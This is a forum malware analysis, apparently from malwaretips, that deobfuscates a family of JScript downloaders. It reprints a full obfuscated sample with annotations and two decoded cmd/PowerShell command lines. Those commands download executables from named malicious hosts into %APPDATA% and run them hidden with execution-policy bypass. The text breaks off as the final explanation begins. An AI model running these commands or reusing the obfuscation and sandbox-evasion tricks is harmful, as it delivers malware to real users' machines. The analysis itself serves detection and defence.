Malware Analysis Script-based samples that run Powershell - From Nov,19 2016 to March,06 2017

DardiM

https://malwaretips.com/threads/18-11-16-10.65618/
Thanks to @silversurfer

Edited :

EURO_27507.js - 6/54


Why this sample ?
Similar to some samples I deobfuscated very quickly (in less than 20 s).
Each time, they seem to take my remarks into account and improve some parts :D

1) What it looks like :

Look at the spoiler: the most important parts are in red (almost all the other parts are unimportant or completely useless).
var uhetu = '92278'; // filler; only read inside branches of the run part that never execute
vidrimkyzt = 'wafe'; // implicit global (no var); filler, same situation

/**
 * Decoy helper: always returns 0.
 * The run part compares its result with undefined, so the branch it guards is dead.
 * @returns {number} 0
 */
function iswer() {
  return 0;
}
vahuc = 'bicq';

/**
 * Decoy helper: always returns 1.
 * The run part tests `ofilxum() === undefined`, which can never hold.
 * @returns {number} 1
 */
function ofilxum() {
  return 1;
}
// document4 is never declared, and typeof on an undeclared name yields the string
// "undefined" without throwing. The run part tests `wawpugw == "undefined"` to reach
// the branch that actually calls Shell.run.
var wawpugw = typeof document4;
var yffapyffa = undefined; // compared with 'nyja' inside a dead branch


// Host check disguised as string assembly. Every triple below contributes only
// its element [1]; elements [0] and [2] are noise. Read in order, the [1] pieces
// spell the source of a one-line function:
//   return new Object().length == 80 && typeof WScript.StdIn.WriteLine == 'unknown'
// Under Windows Script Host, typeof of a COM method reports 'unknown', so the
// expression is true only inside WSH. bufosmy switches on this value for every
// replacement, so outside WSH the command line stays obfuscated. The
// `new Function(...)()` call is the detection-relevant construct here: it compiles
// and runs source text assembled at runtime.
function omide() {
// Prototype pollution: gives every object, including the `new Object()` in the
// assembled check, a length of 80 - the first half of the condition.
Object["prototype"]["length"] = 80;
var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];

// Concatenate the pieces into source text, compile it with the Function
// constructor and run it immediately; the boolean result is what bufosmy switches on.
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
}
var tesuxcarre = 'ygqony'; // filler
var agjobxex = "replace"; // method name used by bufosmy: ocolr[agjobxex](regex, replacement)
var xahlyrw = "38465"; // filler


/**
 * Decoy helper: always returns 1.
 * Only typeof-checked inside a dead branch of the run part.
 * @returns {number} 1
 */
function muwnyrx() {
  return 1;
}
var vqelle = '58690'; // filler, typeof-checked inside a dead branch
var erazyf = "gi"; // RegExp flags used by bufosmy: global + case-insensitive


/**
 * Decoy helper: always returns false.
 * @returns {boolean} false
 */
function cileg() {
  return false;
}
/**
 * Decoy helper: always returns null.
 * The run part compares the result with the string 'rfuknaj', which never matches.
 * @returns {null}
 */
function ymajdeluc() {
  return null;
}
/**
 * Decoy helper: always returns 1.
 * The run part tests `ikiredhu() === null`, so the guarded code is dead.
 * @returns {number} 1
 */
function ikiredhu() {
  const result = 1;
  return result;
}
var sumwyzu = 0; // second argument of Shell.run in the run part (the window-style argument)
var isevz = undefined; // filler
var zawur = 1; // filler


/**
 * Decoy helper: always returns null.
 * Only tested inside the dead else-branch of the run part.
 * @returns {null}
 */
function nyjovyns() {
  return null;
}
var lvoje = 18.4517; // compared with itself inside a dead branch
var axirkuw = 'zyktiz'; // filler
var lwabgyguw = undefined; // `undefined == 0` is false, so the top-level if of the run part takes its else branch
var jobqedv = 0; // `jobqedv === 0` guards the live branch
var rukaby = undefined; // filler
var ujiwja = null; // discriminant of the outer switch in the run part; only `case null:` matches


// Decoder for the command line that is later handed to WScript.Shell.run.
// The array below is joined with "," so the working string carries a comma after
// every element; each pattern in nedxes ends with "," to consume it again.
// Returns the decoded string when omide() is true (inside WSH), otherwise the
// still-obfuscated string. The decoded result is the cmd.exe / powershell.exe
// command line quoted at the end of the post.
function bufosmy() {
var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme", "Xwowme", "nlunoty", "o", "majs", "syby", "nlunoty", "o", "powwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Rxyfn", "qqwowme", "gi", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "Luvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "cag", "wowme", "xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "uuvyl", "vsaqq", "vyl", "saqq", "", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "ioNuvyl", "vsaqq", "vyl", "saqq", "", "Puvyl", "vsaqq", "vyl", "saqq", "", "olisyby", "Ynlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "BYPsaqq", "xyfn", "xyfn", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "nopruvyl", "vsaqq", "vyl", "saqq", "", "OFiLuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "cag", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "Iuvyl", "vsaqq", "vyl", "saqq", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "ouvyl", "vsaqq", "vyl", "saqq", "", "wwowme", "vyl", "wowme", "", "xyfn", "oty", "yuvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "qqwowme", "gi", "ivyl", "uvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "nuvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uzalu", "nwowme", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", 
"Obuvyl", "vsaqq", "vyl", "saqq", "", "jwowme", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "oty", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "xyfn", "Yxyfn", "oty", "wowme", "oty", "myxrwowme", "x", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "Nwowme", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "wwowme", "vyl", "wowme", "", "wowme", "bsyby", "luvyl", "vsaqq", "vyl", "saqq", "", "iuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Nuvyl", "vsaqq", "vyl", "saqq", "", "oty", "fwwowme", "vyl", "wowme", "", "saqq", "s", "yvyl", "usq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "Owwowme", "vyl", "wowme", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "LOuvyl", "vsaqq", "vyl", "saqq", "", "saqq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "fIuvyl", "vsaqq", "vyl", "saqq", "", "lwowme", "uzalu", "oqby", "qqwowme", "gi", "oty", "oty", "pwowme", "tpyvi", "majs", "majs", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "yvyl", "usq", "browwowme", "vyl", "wowme", "", "nsaqq", "lwowme", "oty", "yvyl", "usq", "oty", "opmajs", "ivyl", "yvyl", "usq", "pqqwowme", "gi", "p?f=1yvyl", "usq", "vyl", "saqq", "oty", "oqby", "", "uvyl", "vsaqq", "vyl", "saqq", "", "oqby", "hkyz", "saqq", "ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", "oqby", "fwwowme", "vyl", "wowme", "", "saqq", "s", "iwwowme", "vyl", "wowme", "", "oty", "wowme", "jli", "xyfn", "oty", "saqq", "Roty", "cag", "puvyl", "vsaqq", "vyl", "saqq", "", "rOuvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "xyfn", "xyfn", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "hkyz", "saqq", "Ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");

// Patterns to replace, applied in array order. Several of them ("udvada,",
// "tmyxrex,", "iwtejli,", "qqegi,", "wede,", ...) never occur in the raw array:
// they are produced by earlier replacements, so the order of this array matters.
var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];

// Replacement strings, index-aligned with nedxes ("\," is just ",").
var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];

// Loop index starts as false; `!pfixyg` coerces it to 0 on the first pass.
var pfixyg = false;
while (1) {

if (!pfixyg) pfixyg = 0;
if (pfixyg == nedxes.length) break;
var ugula = nedxes[pfixyg];
// omide() is the host check. There is no `case false:`, so outside WSH the
// replacement is simply skipped and the loop only advances the index.
switch (omide()) {
case true:

// erazyf is "gi": global and case-insensitive, so e.g. "Rxyfn," and "xyfn," both match.
var ovhugca = new RegExp(ugula, erazyf);
// agjobxex is "replace"
ocolr = ocolr[agjobxex](ovhugca, ezujigz[pfixyg]);
break;
}
pfixyg++;
}
return ocolr;
}
var ewubq = bufosmy();

// Only one path through the nested conditionals below is live; everything else
// compares constants that can never match. Given the declarations above:
//   lwabgyguw is undefined  -> `lwabgyguw == 0` is false -> else branch
//   ujiwja is null          -> `case null:`
//   jobqedv === 0           -> true
//   wawpugw is "undefined"  -> true (typeof of an undeclared name)
//   upawkarkez is true      -> `case true:` -> WScript.Shell.run(ewubq, sumwyzu)
// Detection-wise the useful facts are the WScript.Shell object, the "r"+"un"
// method-name split, and wscript.exe spawning the decoded cmd.exe command line.
if (lwabgyguw == 0) { // false: this whole block down to the else is dead
if (yffapyffa == 'nyja') {
var ulxyl = 'egojubv';
if (ulxyl === 0) {

if (typeof vqelle == "string") {
var ysxamhysyks = 6;
var zwupmubhy = "81657";
var jqodliri = null;
var vjyzkejijf = 0;
}
}
}
if (ymajdeluc() == 'rfuknaj') { // ymajdeluc() is null: dead
if (typeof muwnyrx() == "number") {
var rygetqy = undefined;
var obeske = '97649';
var gzavusu = 31.7;
var ubacqud = obeske + gzavusu;
ubacqud = '41348' + ubacqud;
var ipifiwqa = undefined;
var iwujsiwnuq = undefined;
var unuro = "ysmyzavihj";
var igtohixy = 62;
var umlilpabijd = uhetu + igtohixy;
umlilpabijd = 16.286 + umlilpabijd;
var rhememqegza = 55.4;
var ocjulfag = vahuc + rhememqegza;
ocjulfag = 139.21 + ocjulfag;
}
}
} else { // live branch
var ciryrowi = 1;
var bbywuzhugw = 12;
var yjerupr = undefined;
switch (ujiwja) { // ujiwja is null; switch compares strictly, so only `case null:` runs
case '96146':

var tobykzagmi = true;
if (tobykzagmi == false) {

if (ikiredhu() === null) {
var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {

var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}
}
}
if (iswer() === undefined) { // iswer() returns 0, never undefined: dead
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
case undefined:
var tobykzagmi = true;
if (tobykzagmi == false) {

if (ikiredhu() === null) {
var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {

var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}
}
}
if (iswer() === undefined) {

odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
case null: // the live case
// WScript.Shell COM object; its run method launches the decoded command line.
var guhhepxe = WScript.CreateObject("WScript.Shell");
if (jobqedv === 0) { // true

var thucxiw = undefined;
var ycukqajz = false;
var vxoqbexpuhe = null;
var dedsogkybqo = 14.1;
var uficow = dedsogkybqo + tesuxcarre;
uficow = uficow + 5;
var itmemgov = 595;
itmemgov = 57 + itmemgov;
var obhyvtuv = 105.44;
var mnaqkyh = 14.472;
if (wawpugw == "undefined") { // true: wawpugw is typeof of an undeclared name

var upawkarkez = true;
switch (upawkarkez) { // only `case true:` below can run
case undefined:

if (ofilxum() === undefined) {
var dzabosevju = 10.4;
var gizotz = '24306';
}
break;
case 'ilqoqigm':
if (ofilxum() === undefined) {
var dzabosevju = 10.4;
var gizotz = '24306';
}
break;
case null:
if (ofilxum() === undefined) {
var dzabosevju = 10.4;
var gizotz = '24306';
}
break;
case true:
// Shell.run(<decoded command line>, 0). "r" + "un" hides the method name from a
// plain-text search for "run"; sumwyzu is the 0 declared at the top of the script
// and is passed as the WshShell.Run window-style argument.
guhhepxe["r" + "un"](ewubq, sumwyzu);
break;
case false:
if (ofilxum() === undefined) {
var dzabosevju = 10.4;
var gizotz = '24306';
}
break;
}
var ylzuvwase = null;
var wloreny = 'tavoxir';
var eqvabwemov = "mixejcesu";
var fkipele = 19;
fkipele = '32901';
} else { // dead: wawpugw == "undefined" holds
if (lvoje == 18.4517) {
if (nyjovyns() === null) {
var ixiqxamav = "wigabki";
var alxydxuhel = 97;
alxydxuhel = 'hfuhyfc';
var cusyji = undefined;
}
}
var aqobzuhni = null;
if (aqobzuhni === "akremygxa") {

kosaqoj = "peqfelef";
qkoqvefle = 64;
var ercotutxi = kosaqoj + qkoqvefle;
ercotutxi = '22' + ercotutxi;
var ijxoripvepz = null;
var rkusjazgeb = "8103";
var evginocobh = 11;
var vpuwxefne = evginocobh + rkusjazgeb;
vpuwxefne = vpuwxefne + "89355";
var qpimqivt = 0;
var yzugqeb = 'alazutbuck';
var fvekypvyqlu = 52;
var cehpedikq = null;
}
var mulmyso = undefined;
if (mulmyso === undefined) {

var upitov = "udy";
var hamoxife = 20.7;
hamoxife = 1 + hamoxife;
}
}
}
break;
case "igumy":
var tobykzagmi = true;
if (tobykzagmi == false) {

if (ikiredhu() === null) {
var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {

var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}
}
}
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
case 'zqecmalqe':
var tobykzagmi = true;
if (tobykzagmi == false) {
if (ikiredhu() === null) {
var icamge = 'qlisalyx';

if (icamge === 'ibnymm') {
var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}
}
}
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
}
}

Remember the method used against this family :

(1) find the real command line

- One long obfuscated string: the command line passed to the run part
- One array of strings: the patterns to replace in the long string
- One array of chars: the chars that replace those patterns in the long string

(2) find, among the numerous useless lines, the only line that matters:

Shell.run(commmandline, 0)

=> on the script this line is obfuscated :

But there are methods to find it; I have shown them on previous samples, and each time the new sample has been modified so that my method fails :D

2) From previous version :

It didn't change a lot from other previous samples I have analysed.

2-1) The first time :

Quick search for run word :

We found :

case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;

=> Shell.run(commmandline, 0)

=> fqopwytlu : 0 (find by a search on the file content for the var fqopwytlu)

=> yvedy() : a function that returns the deobfuscated command line (see the spoiler part)
// Earlier sample: the command line is stored with four marker tokens spliced into
// it ("ujixxu", "ejewca", "exozett", "sipxuqm") and recovered by chained replace
// calls. hifenmuhz is 'replace'; each (regex, replacement) pair is a variable
// defined elsewhere in that script (their values are listed below in the post).
function yvedy() {
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http://lovexozett.nexozettwsexozett...ixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";

// Equivalent to jaqinod.replace(/ujixxu/gi, '^').replace(/ejewca/gi, 'c')
//   .replace(/exozett/gi, 'e').replace(/sipxuqm/gi, 'a')
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}

This function returns ekihvub, a value built from jaqinod, a string with "strange" content :D

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);

These are string manipulations.
Using the var names and the content of the script, the real values are easy to retrieve:

// Values recovered from the earlier sample's script, in the order yvedy uses them.
hifenmuhz = 'replace';
// pair 1: marker "ujixxu" -> '^' (the cmd.exe escape character, which the shell strips)
var tyfjepfef =
/ujixxu/gi;
var nlany =
'^';

// pair 2: marker "ejewca" -> 'c'
var odacik = /ejewca/gi;
var axucw =
'c';

// pair 3: marker "exozett" -> 'e'
var hyqzuski = /exozett/gi;
var ujcilf =
'e';

// pair 4: marker "sipxuqm" -> 'a'
var jzehykli = /sipxuqm/gi;
var ymidv =
'a';

var etuqmowuh = undefined; // filler

// The chain in yvedy therefore expands to:
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');

So, multiple "replace" calls are used to clean the obfuscated string in jaqinod

Result :

"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe ""
it's easy to understand :

"cmd.exe /c poWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe "
2-2) 2nd old sample:

Quick search for run

We found :

=> this time, the search does not land directly on the obfuscated Shell.run(commandline,0) part!
=> they put the word "run" in a var, so that a search does not reveal the important part directly.

=> var cimy = 'run'
but a search on cimy does the job:

case null:
ittirra[cimy](xpoqys, xvafdyv);
break;

=> xvafdyv = 0;

=>
Shell.run(xpoqys, 0);

xpoqys :
a var that holds the result of the function that retrieves the deobfuscated command line

A search give :

var xpoqys = mhuxezyd();

=> mhuxezyd() is the function that returns the deobfuscated command line string

// Second earlier sample: the same replace loop as bufosmy in the current sample,
// but the patterns and replacement chars are held in variables (their values are
// listed in the explanation below) rather than literals, and the host check is
// evaluated once up front instead of on every iteration.
function mhuxezyd() {
var yvyrsa = "ugq4b5zm5fbco6e74isb4rs4e62y6gbco6e77rs4e6xrs4e6 /ugq4b5 Powo5k9rs4e6rso5k9bco6e7rs4e6lly6gbco6e77o5k9rs4e6xrs4e6o5k9 -o5k9rs4e6xrs4e6o5k9ugq4b5o5k9uo5k9rs4e68ibp9o75Io5k9oNpoo5k9lIugq4b5yo5k9 ByPibp9o7Sso5k9 -o5k9no5k9Opo5k9rOo5k9fio5k9Lrs4e6 o5k9-wINisb4rs4e62oo5k9wsrs4e68ibp9o75ylo5k9rs4e6 o5k9bco6e7io5k9isb4rs4e62isb4rs4e62rs4e6No5k9 o5k9risb4rs4e62u6b8No5k9rs4e6o5k9wo5k9-o5k9oo5k9bjo5k9rs4e6ugq4b5rs4e68ibp9o75o5k9 so5k9yo5k9srs4e68ibp9o75rs4e6o5k9zm5fbco6e74y6gbco6e77Nrs4e6o5k9rs4e68ibp9o75y6gbco6e77Wrs4e6o5k9bo5k9ugq4b5lirs4e6No5k9rs4e68ibp9o75y7a6y6gbco6e77o5k9isb4rs4e62OwNLoibp9o7o5k9isb4rs4e62o5k9Filo5k9rs4e6risb4rs4e62u6b8o5k9'bco6e7rs4e68ibp9o75rs4e68ibp9o75pju9bl2//wipolrs4e6rs4e6ry6gbco6e77rs4e68ibp9o75op/usrs4e6ry6gbco6e77pbco6e7p?f=1y6gbco6e77isb4rs4e62ibp9o7rs4e68ibp9o75','fe8y8ibp9o7ppisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6'y7a6;Srs4e68ibp9o75o5k9ibp9o7o5k9ro5k9rs4e68ibp9o75-pRoo5k9ugq4b5o5k9rs4e6So5k9So5k9 fe8y8ibp9o7PPisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6";

// Patterns to replace; each variable holds a marker string such as "bco6e7".
var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];

// Replacement chars, index-aligned with anwumo.
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];

var mlonyn = 0;
// Host check compiled through the Function constructor, evaluated once; the post
// notes it is true inside the real script host, so no replacement happens elsewhere.
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
while (1) {

if (mlonyn == anwumo.length) break;

var ztihi = anwumo[mlonyn];
var sejep = dopqitna[mlonyn];
// vjopyv holds the "gi" flags (global, case-insensitive)
var qaceco = new RegExp(ztihi, vjopyv);
switch (epsura) {

case true:

// gasvozgi is "replace"
yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);
break;
}

mlonyn++;
}
return yvyrsa;
}

Explanation :

two arrays are used for the replace part :

var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];

  • var anwumo = ["bco6e7", '"y7a6", "ibp9o7", "zm5fh4", "ju9bl2", "ugq4b5", "fe8y8", "rs4e6", "o5k9", "isb4e2", "rdu6b8", '"e8a5", "y6gh7", "u3x5"];
=> an array with the pattern to be replaced
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];

  • var dopqitna = ["h", ")", "a", "m", ":", "c", "%", "e", "^", "d", "(", "t", ".", "\'"];
=> an array with the chars to be used for the replace part
var mlonyn = 0;

=> used as the current index into both arrays
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();

=> used for the switch/case part
=> epsura is true only when the script runs inside the real script host (Windows Script Host), where typeof of a COM member yields 'unknown'
while (1) {

=> 'infinite' loop until it breaks: when all the patterns have been replaced

if (mlonyn == anwumo.length) break;

var ztihi = anwumo[mlonyn];

=> ztihi : string to be replaced, mlonyn : current index
=> example : index = 0 => "bco6e7"
var sejep = dopqitna[mlonyn];

=> sejep : the char / string that replaces it, mlonyn : current index
=> example : index = 0 => 'h'
var qaceco = new RegExp(ztihi, vjopyv);

=> RegExp: a regular expression is an object that describes a pattern of characters

=> vjopyv : "gi" : the flags parameter:


  • g Perform a global match (find all matches rather than stopping after the first match)
  • i Perform case-insensitive matching
=> example : /bco6e7/gi
switch (epsura) {

=> epsura is true if we are in a running script
case true:
yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);

=> gasvozgi = "replace"

=> example :


index =0 :
  • yvyrsa = yvyrsa["replace"](/bco6e7/gi, "h")
  • all "bco6e7" pattern are replaced by "h" (case-insensitive matching)
break;

=> exit the case part
}

mlonyn++;

=> index = index + 1
}
return yvyrsa;

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://wipoleer.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"

3) The current sample :

(1) A search on run => no result ...

=> it seems that in this sample they used another trick to defeat my easy method (searching for the word run)

(2) Let's search for the big function that should build the command line, the parameter of the run method

We have found the famous function that returns the real command line.

=> method : a quick look at the content file :

This time: they used an array of strings that is joined to make a string
A small part :

function
bufosmy() {
var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme",
....
....
....
"hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");

We have got the name of the function : bufosmy

A search on this name :

=> var ewubq = bufosmy();

=> ewubq is very likely the var used in the part we are looking for, an obfuscated line that does the same as:
Shell.run(commandline,0)

Let's verify :

A search on ewubq :

Found !

case true:
guhhepxe["r" + "un"](ewubq, sumwyzu);
break;

hahaha! they have split the word run into "r"+"un" to defeat the previous method, which was based on a search for the word 'run' :D

var guhhepxe = WScript.CreateObject("WScript.Shell");

=> Shell = WScript.CreateObject("WScript.Shell");

=> Shell.run(ewubq, 0);

and we have seen that var ewubq = bufosmy();

Let's understand how this function deobfuscates the command line

function bufosmy() {
